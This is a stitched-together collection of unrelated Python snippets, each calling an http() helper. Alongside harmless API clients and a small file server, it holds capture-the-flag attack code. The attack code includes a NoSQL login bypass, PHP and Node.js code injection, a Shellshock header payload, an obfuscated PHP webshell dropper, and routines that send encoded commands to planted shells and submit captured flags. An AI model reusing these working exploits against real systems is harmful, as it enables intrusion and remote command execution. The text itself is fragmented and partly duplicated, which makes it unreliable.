def run_p2p(target, target_port, cmd): #cmd = create_p2p(target,target_port,cmd) agent_path = shell_path + 'agent.php' http("get", target, target_port, agent_path, '', headers) cmd = ';echo "visit agent.php "' debug_print(cmd) return cmd
def login(target): res = http("get", target, target_port, "/ez_web/admin/index.php", "", {}) pos_1 = res.find("PHPSESSID=") pos_2 = res.find("path") cookie = res[pos_1:pos_2] print cookie data = "uname[$ne]=666&passwd[$ne]=123456&target=login.cgi" res = http("get", target, target_port, "/ez_web/cgi-bin/proxy.cgi?" + data, "", {"Cookie": cookie}) if "success" in res: return cookie return False
def __init__(self, connection): self.http = http self.uri = "streams" self.http = http(url=connection["base_url"], api_key=connection["api_key"], debug_mode=connection["debug_mode"]) self.stream = None
def create_http(): h = http(args.URL) h.setType(args.which) if args.verbose: h.setVerbosity(True) if args.headers: header = "" if len(args.headers) > 0: for head in args.headers: split_head = head.split(":") if len(split_head) == 2: h.addHeader(split_head[0], split_head[1]) #read the data or file to send it as content in post message and add content-Type of header body = "" if args.which == "post": if args.data: body = json.dumps(args.data) h.setData(body) if "Content-Type" not in h.header.keys(): h.addHeader("Content-Type", "application/json" ) #"\r\n" + "Content-Type: application/json") h.addHeader("Content-Length", str(len(body))) if args.file: with open(args.file, 'r') as f: body = f.read() h.setFile(body) if "Content-Type" not in h.header.keys(): h.addHeader("Content-Type", "application/json" ) #"\r\n" + "Content-Type: application/json") h.addHeader("Content-Length", str(len(body))) h.constructContent() return h
def post_flag(flag): flag = flag.replace(" ", "").replace("\n", "") try: res = http("post", flag_server, flag_port, flag_url, "flag=" + flag + "&token=" + flag_token, headers) except Exception, e: dump_error("flag post error", "flag server", "flag.py post_flag") return False
def js_exe(target,filename,cookie): header = {"Cookie":cookie} res = "error" data = "require('./" + filename + "').a('sh ./4');1" try: res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header) except Exception,e: dump_error(target,e,"js_exe.py js_exe") return False
def get_upload_token(self, uuid, parent=""): query = { "access_token": self.access_token, "client_id": self.config.get("jue", "access_key"), "client_secret": self.config.get("jue", "access_secret"), "uuid": uuid, "parent": parent } response = http().RawRequest(action=self.config.get("jue", "api_resource")+"cloud/get_upload_token", method="POST", query=query) return self.result(response)
def post_flag(flag, target): flag = flag.replace(" ", "").replace("\n", "") try: headers['Cookie'] = flag_cookie res = http( "post", flag_server, flag_port, flag_url, "melee_flag=" + flag + "&token=" + flag_token + "&melee_ip=" + target, headers) debug_print(res) except Exception, e: dump_error("flag post error", "flag server", "flag.py post_flag") return False
def cloud_add_app_file(self, **file_info): query = { "access_token": self.access_token, } for k in file_info.keys(): query[k] = file_info[k] response = http().RawRequest(action=self.config.get("jue", "api_resource")+"callback/add_app_file", method="POST", query=query) if response["status_code"] == 200: return response["text"] else: pass
def db_admin_attack(target, cmd, cookie): header = {"Cookie": cookie} res = "error" print cmd cmd = quote(cmd) try: res = http( "get", target, target_port, "/ez_web/admin/db_admin.php?db=admin&action=listRows&collection=zzz&find=array(1);system('" + cmd + "');exit;", "", header) #print res except Exception, e: dump_error(target, "something error happens", "db_admin_attack.py db_admin_attack")
def client_credentials(self): query = { "grant_type": "client_credentials", "client_id": self.config.get("jue", "access_key"), "client_secret": self.config.get("jue", "access_secret"), } response = http().RawRequest(action=self.config.get("jue", "api_oauth")+"ClientCredentials", method="POST", query=query) if response["status_code"] == 200: try: self.memory.set(key="auth", value=response["text"]) self.access_token = json.loads(response["text"])["access_token"] except: pass return response["text"] else: pass
def attack(target, target_port, cmd, get_flag): is_vuln = 1 flag = "hello world!" info = "success" reserve = 0 if check_shell(target, target_port, ""): res = execute_shell(target, target_port, cmd) else: dump_warning(target, "check_shell failed", "function.py check_shell") try: res = http( 'get', target, target_port, "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);", '', {}) print res except Exception, e: dump_error(target, "attack failed", "sample.py attack") res = "error"
def file_write(target, filename, contents, cookie): header = {"Cookie": cookie} res = "error" print "waiting to writes shell..." i = 0 for content in contents: data = "require('fs').appendFile('" + filename + "','" + content + "');1" if i == 0: data = "require('fs').writeFile('" + filename + "','" + content + "');1" try: res = http("get", target, target_port, "/ez_web/admin/count.php?cheat=" + quote(data), "", header) i += 1 except Exception, e: dump_error(target, "something error happens", "db_admin_attack.py db_admin_attack") return False
def secret_portal(self, uid, cfrom="cloud.jue.so", token=""): query = { "access_token": self.access_token, "client_id": self.config.get("jue", "access_key"), "client_secret": self.config.get("jue", "access_secret"), "uid": uid, "from": cfrom, "token": token or hashlib.md5(".").hexdigest() } response = http().RawRequest(action=self.config.get("jue", "api_resource")+"secret/portal", method="POST", query=query) if response["status_code"] == 200: try: user_info = json.loads(response["text"]) self.memory.set("userinfo", user_info["data"]) except: pass return user_info["data"] or response["text"] else: pass
def execute_shell(target, target_port, cmd): if shell_type == 1 or shell_type == 2: shell_name = "." + hashlib.md5(shell_salt + target).hexdigest() + ".php" shell_arg = hashlib.md5(shell_salt_2 + target).hexdigest() c_1 = "system" c_2 = cmd + ";" c_1 = rot13(base64.b64encode(c_1)) c_2 = rot13(base64.b64encode(c_2)) c_1 = c_1.replace('+', '%2B') c_2 = c_2.replace('+', '%2B') data = "a=" + c_1 + "&" + "b=" + c_2 + "&" + "hash=" + shell_arg debug_print("payload => " + data) try: res = http("post", target, target_port, shell_path + "/" + shell_name, data, headers) except Exception, e: dump_error(e, target, "function.py execute_shell") return "error occurs" return res
def execute_shell(target,target_port,cmd): shell_name,shell_arg = shell_hash(target,target_port) if shell_type==1 or shell_type==2: c_1 = "system" c_2 = cmd + ";" c_1 = rot13(base64.b64encode(c_1)) c_2 = rot13(base64.b64encode(c_2)) c_1 = c_1.replace('+','%2B') c_2 = c_2.replace('+','%2B') data = "a=" + c_1 + "&" + "b=" + c_2 + "&" + "hash=" + shell_arg debug_print("payload => " + data) try: res = http("post",target,target_port,shell_path + "/" + shell_name ,data,headers) except Exception,e: dump_error(e,target,"function.py execute_shell") # execute shell timeout if 'timed out' in str(e) or 'Connection refused' in str(e): return "timeout" return "error occurs" return res
def attack(target, cmd, get_flag): is_vuln = 1 flag = "hello world!" info = "success" reserve = 0 if check_shell(target, ""): res = execute_shell(target, cmd) else: dump_warning(target, "check_shell failed", "function.py check_shell") ''' put your payload code here ''' header = {"User-Agent": "() { :; }; " + cmd} try: res = http("get", target, target_port, "/ez_web/cgi-bin/skin_api.cgi", "", header) except Exception, e: print e if "500" not in res: dump_error(target, "not vulnerable", "1.py bashshock")
res = http( 'get', target, target_port, "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);", '', {}) print res except Exception, e: dump_error(target, "attack failed", "sample.py attack") res = "error" index_1 = res.find("href='") + 6 index_2 = res.find("'>shell") shell_url = "/" + res[index_1:index_2] print "[*]shell_url => " + shell_url try: data = "_=system('" + cmd + "')" res = http("post", target, target_port, shell_url, data, {}) print len(res) except Exception, e: dump_error(target, "attack failed", "sample.py attack") res = "error" if get_flag: if check_flag(res): flag = res print "flag => " + res.replace(" ", "").replace("\n", "") else: dump_warning( target, "flag format error,you may need to rewrite the shell", "sample.py attack") elif res == "error": pass else:
def __init__(self, url, nodetype): self.handler = http(url) self.nodetype = nodetype self.__scrapedata()
def __init__(self, connection): self.http = http self.uri = "patterns" self.http = http(url=connection["base_url"], api_key=connection["api_key"], debug_mode=connection["debug_mode"])
else: import pwd config.uid = pwd.getpwnam(config.uid)[2] if config.gid.isdigit(): config.gid = int(config.gid) else: import grp config.gid = grp.getgrnam(config.gid)[2] #load all our components import device scanners = device.scanners(config) import control notify = control.control(config, scanners) import http webserver = http.http(config, scanners) #drop our privileges n stuff os.umask(0077) os.setgid(config.gid) os.setuid(config.uid) #let's spawn everything we need t = threading.Thread(target = notify.serve_forever, name = 'Control') t.setDaemon(True) t.start() t = threading.Thread(target = webserver.serve_forever, name = 'Webserver') t.setDaemon(True) t.start() #signal handler
def handle_client(conn, addr, dir): if args.debugging: print('Handle New client from', addr) try: while True: if args.arq: data = conn.recvall() else: data = conn.recv(2048) data = data.decode("utf-8") if not data: break (method, path, query, body, headers) = parseRequest(data) if args.debugging: print(method, path, body, headers) if ".." in path: if args.debugging: print("Access Denied", path) r = http(400, "Access Denied".encode("ascii")) r.setContent( "You are not allowed to access the files in this folder!". encode("ascii")) else: if not dir.endswith("/"): dir = dir + "/" # if not dir.startswith("./"): # dir = "./" + dir path = (dir + path).replace("//", "/") # print(path) if method == "GET": try: if path.endswith("/"): if args.debugging: print("GET Directory", path) files = os.listdir(path) r = http(200, json.dumps(files).encode("ascii")) r.addHeader("Content-Type", "application/json") else: if os.path.exists(path): if args.debugging: print("FIND File", path) r = http(200, "") kind = magic.from_file(path, mime=True) r.addHeader("Content-Type", kind) if "text" in kind: with open(path, 'r') as f: content = f.read() r.setContent(content.encode("ascii")) else: with open(path, 'rb') as f: content = f.read() r.setContent(content) if "Content-disposition" in headers: r.addHeader("Content-disposition", headers["Content-disposition"]) elif "inline" in query: r.addHeader("Content-disposition", "inline") else: r.addHeader("Content-disposition", "attachment") else: r = http(404, "".encode("ascii")) r.setContent( "File could not be found!".encode("ascii")) except OSError as e: if args.debugging: print(e) r = http(400, e.strerror) elif method == "POST": try: if args.debugging: print("POST File", path) pathlib.Path(os.path.dirname(path)).mkdir( parents=True, exist_ok=True) lock = LockFile(path) lock.acquire() print(os.path.basename(path), " Content", body) with open(path, 'a+') as f: f.write(body + "\n") lock.release() r = http(200, "".encode("ascii")) r.setContent( "Data successfully added!".encode("ascii")) except OSError as e: if args.debugging: print(e) r = http(400, e.strerror) r.setContent("Bad request!!!".encode("ascii")) else: r = http(400, "") if args.debugging: print(r.headToString()) if args.arq: conn.sendall(r.headToString().encode("ascii"), False) else: conn.sendall(r.headToString().encode("ascii")) conn.sendall(r.getBody()) break finally: conn.close()
scan = ap_scan() if options.channel: scan.channel = options.channel scan.initialize() elif options.ssh: util.Msg('Starting SSH server...') tmp = ssh() tmp.initialize() tmp.dump = True elif options.ftp: util.Msg('Starting FTP server...') tmp = ftp() tmp.initialize() tmp.dump = True elif options.http: util.Msg('Starting HTTP server...') tmp = http() tmp.initialize() tmp.dump = True elif options.smb: util.Msg('Starting SMB listener...') tmp = smb() tmp.initialize() tmp.dump = True elif options.wap: util.Msg('Starting wireless access point...') tmp = access_point() tmp.initialize() elif options.update: update() sys.exit(1)